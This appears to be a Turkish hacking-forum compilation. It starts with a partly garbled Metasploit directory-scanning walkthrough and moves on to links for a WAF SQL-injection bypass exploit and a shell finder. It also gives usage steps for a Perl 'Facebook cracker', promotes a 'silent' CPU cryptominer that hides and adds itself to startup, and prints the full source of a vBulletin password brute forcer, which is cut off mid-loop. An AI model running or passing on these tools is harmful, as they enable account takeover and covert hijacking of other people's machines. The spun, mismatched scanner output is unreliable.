Gizli Dizinleri (dir_scanner) Metasploit kullanarak Tarama

Bugün, ev sahipleri ve web sitelerindeki dizinleri tarıyoruz. Bir Pentester olarak, her adımı atmamız ve mümkün olduğunca çok bilgi toplamamız önemlidir. Bu tarama için dirb veya dirbuster gibi pek çok araç var. Ancak şu an için, dir_scanner'ı metasploit'tan tartışıyoruz.

Başlayalım! Önce meta kaynağı yüklemeliyiz.

Gizli Dizinleri (dir_scanner) Metasploit kullanarak Tarama

Bundan sonra isimli bir modül kullanacağız:

1	use auxiliary/scanner/http/dir_listing

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

msf > use auxiliary/scanner/http/dir_scanner msf auxiliary(dir_scanner) > display choices Module choices (auxiliary/scanner/http/dir_scanner):    Title        Present Surroundings                                          Required  Description    ----        ---------------                                          --------  -----------    DICTIONARY  /usr/percentage/metasploit-framework/knowledge/wmap/wmap_dirs.txt  no        Trail of phrase dictionary to make use of    PATH        /                                                        sure       The trail  to spot recordsdata    Proxies                                                              no        A proxy chain of structure sort:host:port[,type:host:port][...]    RHOSTS                                                               sure       The objective cope with vary or CIDR identifier    RPORT       80                                                       sure       The objective port (TCP)    SSL         false                                                    no        Negotiate SSL/TLS for outgoing connections    THREADS     1                                                        sure       The collection of concurrent threads    VHOST                                                                no        HTTP server digital host

Bu modül icin seçenekleri kontrol edin

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

msf auxiliary(dir_listing) > show options Module options (auxiliary/scanner/http/dir_listing):    Name     Current Setting  Required  Description    ----     ---------------  --------  -----------    PATH     /                yes       The path to identify directoy listing    Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]    RHOSTS                    yes       The target address range or CIDR identifier    RPORT    80               yes       The target port (TCP)    SSL      false            no        Negotiate SSL/TLS for outgoing connections    THREADS  1                yes       The number of concurrent threads    VHOST                     no        HTTP server virtual host msf auxiliary(dir_listing) >

Simdi RHOSTS tu sunucunun ip adresine ayarlıyoruz ve tariyoruz

1 2 3

msf auxiliary(dir_listing) > set RHOSTS 10.10.10.8 RHOSTS => 10.10.10.8 msf auxiliary(dir_listing) >

Simdi tarayicinin çalışmasına izin verebiliriz

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

msf auxiliary(dir_scanner) > set RHOSTS 10.10.10.8 RHOSTS => 10.10.10.8 msf auxiliary(dir_scanner) > run [*] The use of code '404' as now not discovered for 10.10.10.8 [*] Discovered http://10.10.10.8/.../ 403 (10.10.10.8) [*] Discovered http://10.10.10.8/Joomla/ 200 (10.10.10.8) [*] Discovered http://10.10.10.8/cgi-bin/ 403 (10.10.10.8) [*] Discovered http://10.10.10.8/error/ 403 (10.10.10.8) [*] Discovered http://10.10.10.8/icons/ 200 (10.10.10.8) [*] Discovered http://10.10.10.8/oscommerce/ 200 (10.10.10.8) [*] Discovered http://10.10.10.8/phpmyadmin/ 200 (10.10.10.8) [*] Discovered http://10.10.10.8/safety/ 200 (10.10.10.8) [*] Discovered http://10.10.10.8/webalizer/ 200 (10.10.10.8) [*] Discovered http://10.10.10.8/webdav/ 200 (10.10.10.8) [*] Scanned 1 of 1 hosts (100% whole) [*] Auxiliary module execution finished msf auxiliary(dir_scanner) >

WAF SQL INJECTI0N [Bypass]

Exploit aşağıdaki linkte

http://link.tl/1k6ap

Perl shell Finder

Link http://link.tl/1jX14

Facebook cracker perl

Download the script, do you got perl installed on pc or kali linux got preinstalled.
Save it on the Desktop

1: open terminal
2: cd Desktop
3: perl facebooker.pl "email" "wordist"
4: replace double quotes and paste in email, replace doublequotes and just drag in a word list in the terminal! Enter and you got it ;)


Link http://link.tl/1jWUR

Basit sql injection

SSM - Silent Bitcoin/Litecoin/Monero CPU Miner

Bununla madencilik havuz bilgilerinize girdikten sonra hedef maden sistemini kurun ve gönderin.

Bu, sizin sahip olmadığınız veya erişme hakkına sahip olmadığınız sistemler veya makineler üzerinde oluşturulmadı veya kullanılmaya yönelik değil.

arka planda CPU'yu kapatmaya başlayacak ve kendisini başlangıçta ekleyecektir.

Litecoin / bitcoin madenciliği için aşağıdaki algoritmaları destekler

 scrypt SHA-256d

Monomer XMR CPU Mining sürüm 1.1'den itibaren eklendi

Ayrıca tek bir iş parçacığı yerine birden çok CPU iş parçacığı üzerinde çalışmayı seçebilirsiniz

Download Version 1.2:https://www.dropbox.com/s/338fqtb8b5eskr...r.zip?dl=0
http://k003.kiwi6.com/hotlink/4n1mheilvn...-Miner.

vBulletin brute forcer

[php]#!/usr/bin/perl use IO::Socket; use LWP::UserAgent; use HTTP::Cookies; use Time::HiRes qw(gettimeofday); $host = $ARGV***91;0***93;; $usern = $ARGV***91;1***93;; $passw = $ARGV***91;2***93;; $uname = $ARGV***91;3***93;; $url = "http://".$host; $alpha = "abcdefghijklmnopqrstuvwxyz"; #charset $charcount = 24; #number of chars in $alpha $dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds. $count = 0; $logins = 0; $minchars = 1; #min chars $maxchars = 10; #max chars print q( ########################################################### # vBulletin brute forcer # # http://www.unnamedone.com # # brian_denys@hotmail.com # # 09 - April - 2008 # ################## Coded By UnnamedOne #################### ); if (@ARGV < 4) { print " # I am not responsible for anything that you do with this!\n"; print " # This has been tested on vBulletin 3.6.8 and 3.7.0!\n"; print " # usage : vbrute.pl ***91;host & path***93; ***91;user***93; ***91;pass***93; ***91;target***93;\n"; print " # E.g : vbrute.pl www.milw0rm.com/vBulletin3.6.8/ UnnamedOne MyPass str0ke\n"; exit(); } fakelogin(); for(my $t=$minchars;$t<=$maxchars;$t++) { crack($t); } sub fakelogin { $xplr = LWP::UserAgent->new() or die; $cookie_jarr = HTTP::Cookies->new(); $xplr->cookie_jar( $cookie_jarr ); $resr = $xplr->post($url.'login.php?do=login', Content => ***91; "vb_login_username" => "$usern", "vb_login_password" => "$passw", "do" => "login", ***93;,); if($cookie_jarr->as_string =~ /IDstack=(.*?);/) { #Do nothing.. } else { #print $cookie_jarr->as_string; print "Forum not vulnerable or wrong username / password.\n"; exit(); } } sub crack { $xpl = LWP::UserAgent->new() or die; $cookie_jar = HTTP::Cookies->new(); $CharSet = shift; @RawString = (); for (my $i =0;$i<$CharSet;$i++) { $RawString***91;i***93; = 0; } $Start = gettimeofday(); do { for (my $i =0;$i<$CharSet;$i++) { if ($RawString***91;$i***93; > length($alpha)-1) { if ($i==$CharSet-1) { $cnt = 0; return false; } $RawString***91;$i+1***93;++; $RawString***91;$i***93;=0; } } $ret = ""; for (my $i =0;$i<$CharSet;$i++) { $ret = $ret . substr($alpha,$RawString***91;$i***93;,1); } $count++; if($count == 4) { fakelogin(); $count = 0; } $xpl->cookie_jar( $cookie_jar ); $res = $xpl->post($url.'login.php?do=login', Content => ***91; "vb_login_username" => "$uname", "vb_login_password" => "$ret", "do" => "login", ***93;,); $cnt++; $Stop = gettimeofday(); if ($Stop-$Start>$dbgtmr) { $cnt = int($cnt/$dbgtmr); $Start = gettimeofday(); } $logins++; system("clear"); $pro = ($logins / ($charcount * $maxchars)); print "Current password: $ret\n"; print "Login attempts: $logins\n"; print "Cracking speed: $cnt passwords/sec\n"; print "$pro% finished.\n"; $cnt = 0; if($cookie_jar->as_string =~ /IDstack=(.*?);/) { print "Password cracked! => $ret\n"; exit(); } $RawString***91;0***93;++; }while($RawString***91;$CharSet-1***93;